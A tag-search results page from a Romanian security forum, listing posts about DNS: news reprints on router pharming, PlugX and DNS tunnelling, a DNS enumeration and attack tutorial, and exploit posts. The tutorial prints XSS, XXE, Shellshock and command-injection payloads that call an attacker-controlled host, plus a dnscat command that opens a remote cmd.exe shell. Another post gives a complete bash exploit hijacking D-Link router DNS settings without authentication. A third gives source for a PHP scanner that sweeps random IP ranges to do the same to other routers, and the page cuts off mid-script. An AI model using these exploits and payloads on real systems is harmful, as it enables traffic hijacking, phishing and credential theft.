Jump to content

Search the Community

Showing results for tags 'dns'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 17 results

  1. Synopsis: The recent DDoS drama with Dyn has had me reading up on Domain Name Systems (DNS). Time and time again, bad guys have proved that one of the best ways to execute a successful Distributed Denial of Service (DDoS) is to hit DNS servers. As a pentester, name servers do come up a lot during assessments, especially during the reconnaissance phases. We still come across a few public name servers allowing zone transfers every now and then, which is always a treat, but I hardly ever look at DNS servers as an actual target. I still haven’t come across a client that’s actually willing to pay anyone to bring their services down. The DDoS against Dyn was particularly troublesome because Dyn is a major DNS provider and the attacks caused serious outages to a number of popular sites; Twitter, Paypal, Reddit, Github, Spotify and more. Which got me thinking; if I was a bad guy doing my recon, looking for the best name servers to hit, how would I go about it? Which name servers would I pick? Querying a domain for the name server(s) it uses is pretty straight forward, but if the name server was my target and a denial of service was my goal, I’d want to find out the opposite; how many domain names are using the target name server? Source: https://thevivi.net/2016/11/17/dnsnitch-reverse-ns-lookups-zone-transfers/ GitHub Repository: https://github.com/V1V1/DNSnitch Bonus: axfr.py - https://github.com/V1V1/axfr.py (script that takes a list of domains as input and attempts zone transfers on all of them against a specified name server)
  2. https://www.admin.md Astept sugestii in legatura cu functionalul sitului, ce pot sa adaug sau sa scot. Merci
  3. Cache Poisoning using DNS Transaction ID Prediction Example of a Cache Poisoning Attack on a DNS Server DNS Vulnerabilities in Shared Host Environments Example DNS Flooding – Creating a DNS Denial of Service Attack DNS Man in the Middle Attacks DNS Hijacking https://u.nya.is/ffkswv.pdf Sper să vă fie de folos. Recomandat de a se utiliza împreună cu o
  4. Smart DNS Proxy IPS (expiring on Tuesday, July 19, 2016) ////////////////////////////////////////////////////// Australia - Melbourne 168.1.79.238 Australia - Sydney 54.66.128.66 Brazil 54.94.226.225 Canada - Montreal 169.54.78.85 Canada - Toronto 169.53.182.120 Germany 54.93.173.153 India 169.38.73.5 Ireland 54.229.171.243 Israel 195.28.181.161 Italy 95.141.39.236 Japan 54.64.107.105 Mexico 169.57.10.21 Netherlands 46.166.189.68 New Zealand 223.165.64.97 Singapore 54.255.130.140 South Africa 1 154.70.152.42 South Africa 2 129.232.164.26 Spain 192.162.27.100 Sweden 46.246.29.69 Switzerland 81.17.17.170 Turkey 188.132.234.170 US East - N. Virginia 23.21.43.50 US Center - Dallas 169.53.235.135 US West - Los Angeles 54.183.15.10
  5. Pharming attacks are generally network-based intrusions where the ultimate goal is to redirect a victim’s web traffic to a hacker-controlled webserver, generally through a malicious modification of DNS settings. Some of these attacks, however, are starting to move to the web and have their beginnings with a spam or phishing email. Researchers at Kaspersky Lab have been watching this trend for some time, reporting in September on a particular campaign in Brazil targeting home routers using a combination of drive-by downloads and social engineering to steal banking and other credentials to sensitive web-based services. Messaging security company Proofpoint yesterday reported on the latest iteration of this attack, also based in Brazil. The campaign was carried out during a five-week period starting in December when Proofpoint spotted phishing messages, fewer than 100, sent to customers of one of the country’s largest telecommunications companies, Oi, also known recently as Telemar Norte Leste S/A. Users were sent a phishing email warning them of a past-due account and providing them a link supposedly to a portal where they could resolve the issue. Instead, the websites host code that carries out a cross-site request forgery attack against vulnerabilities in home UTStarcom and TP-Link routers distributed by the telco. The pages contain iframes with JavaScript exploiting the CSRF vulnerabilities if present on the routers. They also try to brute force the admin page for the router using known default username-password combinations. Once the attackers have access to the router, they’re able to change the primary DNS setting to the attacker-controlled site, and the secondary setting to Google’s public DNS. “Setting a functioning DNS server as the secondary will allow DNS requests from clients in this network to resolve even if the malicious DNS becomes unavailable, reducing the chance that the user will notice an issue and contact their telecom’s Customer Support line for assistance, which could lead to the discovery and eventual removal of the compromise,” Proofpoint said in its advisory. Via this method, the attacker bypasses the need to own public DNS servers in order to redirect traffic, and have an easier path to man-in-the-middle attacks, which they can use to sniff traffic, in this case for banking credentials, or email. “It’s elegantly vicious,” said Kevin Epstein, vice president, advanced security and governance at Proofpoint. “It’s an attack that, based on the way it’s constructed, is almost invisible. There are no traces on the laptop other than the [phishing] email and unless you’re a security pro logged into the router and know what the DNS is supposed to be, you can look at it and not realize it’s been compromised.” The best defense is to change the router password, especially if it’s still the default provided by the ISP. The potential for trouble extends well beyond this small campaign in Brazil; any router secured with default credentials is susceptible to this attack and a plethora of others. Kaspersky researcher Fabio Assolini, who lives in Brazil, said he’s seeing an average of four new such attacks daily. “It’s not a limited pharming campaign; it’s massive,” he said. Router hacks have been a growing nuisance in the last 12 to 18 months, with more white hat researchers looking into the breadth and severity of the issue. Some cases, such as the Misfortune Cookie vulnerability in a popular embedded webserver called RomPager, have put 12 million devices, including home routers, at risk of attack. Last summer during DEF CON, a hacking contest called SOHOpelessly Broken focusing on router vulnerabilities, yielded 15 zero-day vulnerabilities that were reported to vendors and patched. While in this case, the attackers targeted banking credentials for online accounts, Proofpoint’s Epstein said he can see that scope expanding. “As far as motive, the [proof of concept exploits] we saw seem financially motivated, which is typical of most cybercrime, but the technique is generally applicable,” he said. “If you wanted to harvest a bunch of traffic for a DDOS attack or get into a company, this is a way to do it and gain complete man-in-the-middle control over the user.” Source
  6. Domeniu Nume Sistem ( DNS ), este unul din instrumentele pe care le folosim foarte des pentru a naviga pe internet, acesta fiind folosit pentru a transforma o adresa WEB sau un HOSTNAME cu formatul www.numesite.com.it.ro.net.ecc intr-o adresa IP cu formatul numeric nnn.nnn.nnn.nnn . Cum o sa vedem in continuare, DNS-urile au mult mai multe functii, iar scopul acestui tutorial este acela de a vedea, cum putem efectua ENUMERARI DI DESCOPERIRI, adica cum sa citim adresele IP asociate unui domeniu si sa descoperim sub-domeniile conectate acestuia . Tipuri de DNS Inainte de a incepe cu practica, este necesar sa clarificam, care sunt principalele tipuri de DNS si campul lor de utilitate Tip de DNS || Descriere A || Transofrma un HOSTNAME intr-o adresa IPv4 AAAA || Transforma un HOSTNAME intr-o adresa IPv6 CNAME || Transforma un HOSTNAME intr-un alt HOSTNAME MX || Ne da adresa de E-mail Exchange folosita pentru trimiterea de e-mail NS || Ne da adresa NAMESERVER folosita pentru gestionarea "recordDNS" TXT || Ne ofera un sir ( string ) SRV || Service Record, folosit pentru a specifica un tip de serviciu, poate contine HOSTNAME-ul si PORT-ul pe care serviuciu lucreaza, foarte des folosit pentru VoIP PTR || Pointer Record, folosit pentru a obtine un HOSTNAME pe IP Pe pagina de Wikipedia, este disponibila lista completa tuturor tipurilor de DNS record . Enumerare si descoperire Tool-ul care ne permite sa facem chemari de tip DNS ( request ) este dig . Sa vedem cum putem sa chemam tipul de DNS " A " al domeniului HTML.it, folosind serverul DNS google ( 8.8.8.8 ) : dig @8.8.8.8 -t A html.it Dar daca vom vrea sa obtinem toate topurile de DNS record, fara sa specificam ce vrem pas cu pas, vom folosii : dig @8.8.8.8 -t ANY html.it Informatiile primite de la dig, pot fii prea putine si incomplete, putem insa sa obtinem mai multe informatii folosind dnsdict6 . dnsdict6 -4 -d -S html.it Comenzile precendente : Paramentrul " -4 ", efectueaza enumerarea si pe protocolul IPv4 Paramentrul " -d ", ne arata informatii si indrumari IPv6 Paramentrul " -S ", cere efectuarea enumerari pe tipul de DNS SRV dnsdict6 contine default un dictionar de aproximativ 1500 de cuvinte cheie, care sunt utilizate ( cum se vede in iesire precendenta ( output )), pentru a gasii domenii de nivelul 3 ( numite sub-domenii ) . Este posibil daca vrem sa specificam un dictionar extern . dnsdict6 -4 -d -S html.it /home/simone/dizionari/dns_presonal.txt Acum ca am obtinut o lista mai mult sau mai putin completa de sub-domenii putem sa trecem la folosire de " dnsenum ", o comanda care in afara ca probeaza din dictionar cuvintele cheie, efectueaza o cautare direct pe Google, pentru a ne da rezultate mult mai exacte . dnsenum --dnsserver 8.8.8.8 --enum html.it Comenzile precendente : Parametrul " -dnsserver ", specifica pe care server sa mergem si sa efectual request-urile Parametrul " -enum ", porneste varie tipuri de enumerare, dintre care, dictionar, cautare Google si rezultate Whols . Pe langa toate astea, este posibil sa obtinem o lista cu sub-domenii cu ajutorul Google ( excluzand rezultatele care contin WWW, utilizand stringul ca in exemplu : site:html.it -www Incest puct in care suntem ajunsi avem mult mai multe informatii despre domeniul pe care il analizam . Putem strange acum cuvintele cheie pe care le-am folosit, pentru a proteja domeniul de atacurile de tip " Man-in-the-Middle" sau transferuri frauduloase . Acest sistem de protejare se numeste DNSSEC . dnsrecon -d verisigninc.com Paramentrul " -d ", ne permite sa specificam domeniul asupra caruia vrem sa efectual enumerarea . Acum, avem destule informatii pentru a face descoperirea ( discovery ) : este vorba de procesul de cautare prin adresele IP ( vecine ), cautand alte nume DNS, care pot face referire la tinta noastra ( target ) . dnsrecon -r 151.1.244.200/24 Parametrul " -r ", efectueaza un " Reverse Lookup " . Range-ul ( Gama ), este specificata cu un netmask, este request-ul care este trimis serverului DNS de tip PTR . Pentru a face reversing adreselor IPv6, putem folosii dnsrevenum6 : dnsrevenum6 8.8.8.8 2001:41d0:1:ad64:1::/48 In precedenta comanda, primul parametru este adressa serverului DNS ( in acest caz Google ) si al doilea parametru este range-ul, specificat cu netmask /48, al adresei IPv6 . Toate informatiile adunate, provin din servicii publice, deci sunt consultabile de oricine, nu am facut nici o ilegalitate pe durata procesului de enumerare si descoperire . DNS : Functionarea si verificarea acestuia de vulnerabilitati Parcursul unui request DNS . Imaginea de mai sus, a fost selectata din prezentarea tinuta de Ron Bowes ( angajat Google ), tinuta la DerbyCon 2014, unde explica exact cum functioneaza un request DNS . Primul dispozitiv pe care il vom interoga va fii router-ul nostru . In cazul in care nu s-au facut request-uri pana acum, request-ul va ajunge la serverul DNS configurat in internul router-ului . Daca nici Google nu este abil pentru a rezolva adresa, va face intrebari root-serverelor (servere care sunt responsabile pentru fiecare domeniu de nivel 1 in parte ) . Daca nici aceste ultime masuri nu gasesc raspunsul, vor face un tur de request-uri la autohoritative server, care este un server DNS sub controlul nostru . In acest mod vom putea raspunde originalului request DNS cu valoarea aleasa de noi . Trebuie sa stim sa serviciul DNS este lasat deschis in majoritatea parilor de server, daca nu ar fi asa, nu ar mai exista posibilitatea ca serverul sa comunice cu toti la nivel global . Acesta ne permite sa comunicam cu serverul, reusind sa trecem peste eventuali Firewall sau Intrusion Prevention System ( IPS ) . Noi metode de atac folosind DNS-uri, verificarea de vulnerabilitati Intr-un assessment in blackbox este greu sa intelegem cum datele vin in internul sistemului . Cu ajutorul DNS-ului putem sa urmarim sau cel putin sa intelegem daca datele noastre sunt acceptate de terzi . Cross-Site Scripting ( XSS ) In perioada 2010 si 2012 au fost efectuate teste pe trei mari portale de Whols surprinzand, ele fiind vulnerabile atacurilor XSS, atacatorul crease un record DNS de tip TXT cu un cod similiar acestuia . <script src="http://siteulnostru/evil.js"></script> Folosind alte tipuri de DNS, cum ar fi, CNAME, MX sau PTR, ar fi fost mult mai greu, vazand ca tipurile de record precedente nu permit folosirea de spatii sau ghilimele ca in exemplu . <script/src='http://siteulnostru/evil.js"></script> Atacatorul a reusit sa injecteze un cod malitios permanent, care putea afecta orice vizitator . SQL injection Exista multe functii PHP sau ASP, care permit sa preluam valoarea unui record DNS . Aceste date pot fii folosite in continuare si utilizate intr-un query SQL fara a fi filtrat . Sa vedem cum putem exploata acest tip de vulnerabilitate, folosindune de un exemplu dat de Ron Bowse facut in PHP . Atacatorul are posibilitatea de a modifica query-ul SQL, obtinand parola unui alt user, utilizand un record DNS de tip TXT ca in exemplu . Acesta fiind un singur exemplu unde utilizatorul stie codul sursa al aplicatiei . Intr-un caz real este greu sa afli adevaratul query SQL daca nu stii cum a fost scris . XML External Entity ( XXE ) Putem verifica daca un sistem este vulnerabil XXE introducand in internul fisierului sau a query XML, un cod ca cel ce urmeaza : ]<!ENTITY xxe SYSTEM "http://notexistingname.ourserver.org" >]> <user>&xxe;</user> Daca vom primii pe serverul nostru un request de rezolutie DNS pentru " notexistingname ", vom stii ca sistemul este vulnerabil actiunilor externe . In acest punct ajunsi putem sa incepem sa adunam fisiere locale, cum ar fii /etc/passwd . ShellShock Una dintre metodele de invazie pentru a verifica prezenta unui bug Bash ( ShellShock ), este folosirea rezolutiei DNS cu ajutorul nslookup, comanda recunoscuta pe Windows, Linux si Mac . Se poate imposta un user-agent si sa asteptam ca vin request-urile . () { test;};nslookup shellshocked.ourserver.org Daca vom primii pe serverul nostru un request de rezolutie DNS pentru " shellshocked ", vom sti ca aplicatia web foloseste un script cu o versiune vulnerabila de Bash . Putem deci sa executam orice alta comanda in locul simplei nslookup . Remote command execution ( RCE ) Ca in exemplul de Shellshock putem executa nslookup, pentru a verifica vulnerabilitatile de tip RCE, pentru a face asta sunt o gama larga de trucuri ca in exemplu : ;nslookup shell.ourserver.org `nslookup shell.ourserver.org` |nslookup shell.ourserver.org $(nslookup shell.ourserver.org) Ca in exemplele precedente, cand vom primi un request de rezolutie pentru " shell ", va insemna ca am verificat vulnerabilitatea si putem incepe atacul . DNS : Atac post-verificare Noi metode de atac folosind DNS-uri, post-verificare Dupa ce am verificat ca unul dintre atacurile precendent a functionat, putem in continuare sa folosim serviciul DNS pentru a mentine un profil low fara a face prea mult " zgomot " pe reteaua tintei noastre . Vom aveam nevoie de un tool numit dnscat, prezent in internul nbtool, poate fii obtinul prin GitHub . dnscat --listen -p 53 Comanda precedenta : " -listen ", deschide dnscat in modul server ( ascultare ) " -p ", identifica port-ul pe care va face " listening " . 53 fiind default, acela al serviciului DNS Acum putem sa deschidem pe masina tintei, dnscat ca si client, care va reintoarce ca shell de comenzi de windows ( cmd.exe ) . dnscat --dns virtualmachine1 -e cmd.exe Aici : " -dns ", identifica IP-ul sau hostname-ul masinii pe care este pornit dnscat in modalitatea server. " -exec ", porneste promp-ul de comnezi windows Iar acesta in schimb este vizualul serverului . Tot ce este scris si citit de dnscat, trece prin queryDNS, asa cum putem vedea explorand cu Wireshark : Concluzii Am vazut cum sa folosim si sa abuzam de un serviciu care a existat mereu inca din primi ani '80 si pe care tot internetul se bazeaza . Tutorialul ne arata cum este posibil sa obtinem informatii facand query-uri de tip DNS si expoatarea unui canal de comunicare greu filtrat . Multe metode de recunoastere si atac prezente in acet tutorial sunt ramificate din prezentarea lui Ron Bowse . Videoul urmator, este o demonstratie de atac XSS majoritatii site-urilor Whols . Sursa
  7. CANCUN–Attackers have long used distributed denial of service attacks to knock domain-name servers offline but over the last several months malware creators have taken to using DNS requests to tunnel stolen data. Jaime Blasco, vice president and chief scientist at AlienVault, showed a handful of real malware samples that are using this technique at the Kaspersky Lab Security Analyst Summit Tuesday. Blasco, who’s identified suspicious domains before, took the crowd through the motions by discussing some tools to use: NSTX, OzymanDNS, Iodine and perhaps the best known, DNScat. The apps allow users to upload files, run shells, and powershell scripts to download other payloads to use within attacks. For the attack, Blasco described how there has to be an upstream channel which has a fully qualified domain name (FQDN) that has a minimum label length of 63 octets and a maximum domain length of 255 octets. The downstream channel can store a handful of different files in the: TXT records, CNAME records, NULL records and on occasion AAAA records. As part of an experiment Blasco and company found 50 million files that contained traffic, threw it into a parser and found that many malware samples store a URL in a TXT file and tell it which piece of spyware or malware to deploy. “There’s a bunch of software that are using DNS in a weird way,” Blasco said. One of the types of malware they found, FeederBot, was using base64 to encode and had an RC4 encrypted payload. Others used base64 and XOR. Blasco also stumbled upon FrameworkPOS, a fairly recent POS malware variant that was curiously spotted using DNS, although he believes the creators were either testing it out to allow DNS or had access to a company that used it. Morto, a worm that’s been around for a while and PlugX, a remote administration tool that’s existed in some incarnation since 2008, but has been making a return as of late, also turned up. Blasco said that since outbound DNS is usually allowed on corporate networks, many attackers have used it and avoided detection with a simple network protector like MyDLP. Anomalies in DNS traffic, like large content in TXT or NULL records, or a spike in DNS queries, or queries with long domains and subdomains are signs that something fishy might be afoot with a system’s DNS requests, he said. Source
  8. #!/bin/bash # # D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit # # Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # Description: # Different D-Link Routers are vulnerable to DNS change. # The vulnerability exist in the web interface, which is # accessible without authentication. # # Tested firmware version: EU_2.03 # ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link # DEVICES OR FIRMWARE VERSIONS MAY AFFECTED. # # Once modified, systems use foreign DNS servers, which are # usually set up by cybercriminals. Users with vulnerable # systems or devices who try to access certain sites are # instead redirected to possibly malicious sites. # # Modifying systems' DNS settings allows cybercriminals to # perform malicious activities like: # # o Steering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # # o Replacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # # o Controlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # # o Pushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # if [[ $# -gt 3 || $# -lt 2 ]]; then echo " D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit" echo " ================================================================" echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>" echo " Example: $0 192.168.1.1 8.8.8.8" echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" echo "" echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>" echo " http://www.ethical-hacker.org/" echo " https://www.facebook.com/ethicalhackerorg" exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then echo " Error : libwww-perl not found =/" exit; fi GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1 Source
  9. Existing in some form since 2008, the popular remote access tool PlugX has as notorious a history as any malware, but according to researchers the tool saw a spike of popularity in 2014 and is the go-to malware for many adversary groups. Many attacks, especially those occurring during the latter half of the year, were seen using the tool. In fact, researchers are theorizing the further proliferation of PlugX, which enables attackers to log keystrokes, modify and copy files, capture screenshots, as well as the ability to quit processes, log users off, and completely reboot users’ machines, could suggest eventual worldwide adoption. The malware was the most used variant when it came to targeted activity in 2014 according to Crowdstrike’s Global Threat Report, released today. Despite kicking around for years, the malware is now the de facto tool for dozens of China-based adversarial groups the firm tracks. One of the ways the malware improved itself in 2014, and in turn caught on, was by switching up the way it communicates with its infrastructure further up the chain. By implementing a newer DNS command and control module, the malware has been able to send its data in the form of long DNS queries to its overseeing infrastructure. By modifying the way the DNS and HTTP requests are produced, something Crowdstrike is calling a deviation from “some of the more typically monitored protocols,” it’s made it more difficult to be detected over the past year or so. “The upward trend in use of PlugX indicates an increasing confidence in the capabilities of the platform, justifying its continued use across multiple sectors and countries,” according to the report. One of the groups that Crowdstrike caught dropping PlugX on machines was a hacking collective it calls Hurricane Panda, who used the malware’s custom DNS feature to spoof four DNS servers, including popular domains such as Pinterest.com, Adobe.com, and Github.com. Instead of their legitimate IP addresses, the malware was able to instead point these domains to a PlugX C+C node. The malware, as has been the case in the past, is commonly delivered via a spear phishing attack. Some of attacks go on to leverage a zero day from last March, CVE-2014-1761, which exploits vulnerable Microsoft RTF or Word documents. Others, meanwhile, make use of well-worn holes like CVE-2012-0158 in PowerPoint and Excel, that were also used by the IceFog, Red October, and Cloud Atlas attacks. While some of the groups using PlugX have gone out of their way to register new domains for leveraging the malware’s C+C, many domains from the last several years remain active, something else that Crowdstrike has attributed to the malware’s success and persistence over the years. The firm has two schools of thought when it comes to rationalizing how the malware has become so commonplace. It’s thought that there’s either a central malware dissemination channel that’s pushing PlugX out to adversary groups or that groups that hadn’t used PlugX in the past have recently been able to get copies of it via public repositories or the cybercrime underground. Either way, while the malware is mostly used by attackers from “countries surrounding China’s sphere of influence,” the report suggests that that trend could change soon enough. The malware has been used in recurring attacks against commercial entities in the U.S., and in other politically fueled attacks, but its rapid deployment “could be a precursor to future worldwide use,” according Crowdstrike. “The ongoing development of PlugX provides attackers with a flexible capability that requires continued vigilance on the part of network defenders in order to detect it reliably.” Source
  10. Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Readme: # RouterHunterBR TOOL - Unauthenticated Remote DNS , Scanner ranger IP. * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/ - Description: ------ The script explores three vulnerabilities in routers * 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ * 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ * 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ - Execute: ------ ``` Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ``` - Dependencies: ------ ``` sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ``` - EDITING TO ADD NEW EXPLOITS GETS: ------ ``` TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; #DEFINITION OF EXPLOITS line 92: $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; line 93: $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; line 94: $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; ``` Download: <?php/* * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS change/ users & passwords * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/'>http://packetstormsecurity.com/user/googleinurl/ ---------------------------------------------------------- * Description:* The script explores two vulnerabilities in routers 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ ---------------------------------------------------------- * Execute* Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ---------------------------------------------------------- * Dependencies* sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ---------------------------------------------------------- *Update* https://github.com/googleinurl/RouterHunterBR ---------------------------------------------------------- */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); (!isset($_SESSION) ? session_start() : NULL); $_SESSION["cont_ip"] = 0; //SETANDO CORES TERMINAL $_SESSION["c00"] = "\033[0m"; // COLOR END $_SESSION["c01"] = "\033[1;37m"; // WHITE $_SESSION["c02"] = "\033[1;33m"; // YELLOW $_SESSION["c13"] = "\033[02;31m"; // DARK RED $_SESSION["c05"] = "\033[1;32m"; // GREEN LIGHT $_SESSION["c07"] = "\033[1;30m"; // DARK GREY $command = getopt('h::', array('dns1:', 'dns2:', 'file:', 'proxy:', 'output:', 'limit-ip:', 'range:', 'rand::', 'help::', 'ajuda::')); //VERIFYING LIB php5-curl IS INSTALLED. (!function_exists('curl_exec') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c00"]}\n")) : NULL ); (!defined('STDIN') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}Please run it through command-line!{$_SESSION["c00"]}\n")) : NULL); empty($command) ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}DEFINE THE USE OF ARGUMENTS{$_SESSION["c00"]}\n")) : NULL; (isset($opcoes['h']) || isset($command['help']) || isset($command['ajuda']) ? __banner(NULL) : NULL); #=============================================================================== ########################## CONFIGURATION SCRITPT ############################### #=============================================================================== $params['dns1'] = not_isnull_empty($command['dns1']) ? $command['dns1'] : NULL; $params['dns2'] = not_isnull_empty($command['dns2']) ? $command['dns2'] : NULL; /* TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; */ #DEFINITION OF EXPLOITS $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; !not_isnull_empty($params['dns2']) && !not_isnull_empty($params['dns2']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE DNS1 and DNS2 ex: --dns1 '0.0.0.0.0' --dns2 '0.0.0.0.0'{$_SESSION["c00"]}\n") : NULL; $params['file_output'] = not_isnull_empty($command['output']) ? $command['output'] : __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE FILE SAVE OUTPUT ex: --output saves.txt{$_SESSION["c00"]}\n"); $params['file'] = not_isnull_empty($command['file']) ? __getIPFile($command['file']) : NULL; $params['rand'] = isset($command['rand']) ? TRUE : NULL; $params['limit-ip'] = not_isnull_empty($command['limit-ip']) ? $command['limit-ip'] : NULL; $params['proxy'] = not_isnull_empty($command['proxy']) ? 